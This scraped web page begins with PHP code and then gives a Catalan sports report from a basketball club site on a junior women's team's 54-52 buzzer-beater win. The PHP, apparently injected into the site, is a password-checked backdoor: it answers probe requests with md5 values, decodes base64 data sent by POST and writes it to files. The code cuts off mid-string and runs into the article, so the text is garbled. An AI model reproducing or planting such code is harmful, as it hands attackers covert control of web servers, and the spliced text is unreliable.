function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior fem. 06-07A guanya sobre la botzina! (54-52) - Tgn Bàsquet Club -

El Júnior fem. 06-07A guanya sobre la botzina! (54-52)

Updated: febrer 23, 2024

El partit va començar de dolç amb un 8-0 per al TGN, però un parcial de 10-0 de les visitants van fer un altre partit més saltar les alarmes, amb una diferència de deu punts, i el més alarmant amb una sequera anotadora de 9 minuts, que es diu aviat.

La diferència de deu punts es reduiria a només un punt en només 4 minuts de joc del segon període, però una altra vegada un altre parcial de 12-1 de les visitants posaria ara la màxima diferència del partit per a elles en 11 punts.

El tercer quart seria el millor per a les del TGN amb 24 punts encistellats, amb cinc triples inclosos. A l‘últim període, el partit estava en un puny: durant els primers minuts les de Sant Just van perdonar molts llançaments de tirs lliures, i finalment seria decisiu a l’últim minut i mig (en què les locals van arribar a anar 3 avall al marcador), la jugadora interior del TGN Aina Estebanell anotaria el seu primer triple de la temporada per empatar el matx, i amb el partit empatat a falta de 1.6 segons per desempatar-lo i anar a la pròrroga decidiria el partit amb un llançament a prop del cèrcol que acabaria en cistella. Quina victòria LILES!